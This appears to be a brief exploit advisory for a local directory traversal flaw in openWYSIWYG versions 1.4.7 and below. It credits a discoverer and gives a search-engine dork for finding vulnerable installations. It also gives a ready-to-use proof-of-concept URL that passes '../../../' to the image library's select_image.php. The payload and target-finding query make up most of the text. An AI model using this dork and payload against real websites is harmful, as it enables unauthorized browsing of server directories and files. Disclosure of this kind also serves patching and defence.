openWYSIWYG versions 1.4.7 and below suffer from a directory traversal vulnerability.
a0ba67e5be9f9fd84c60d90757dac635ae97a60d6571a46bbfba9e95a8845c42
[--- openWYSIWYG <= 1.4.7 Local Directory Transversal Vulnerability ---]
[-- Discovered by Juri Gianni aka yeat - staker[at]hotmail[dot]it --]
[-- Visit http://zeroidentity.org --]
[-- allinurl: addons/imagelibrary/select_image.php --]
http://[target]/[path]/addons/imagelibrary/select_image.php?dir=../../../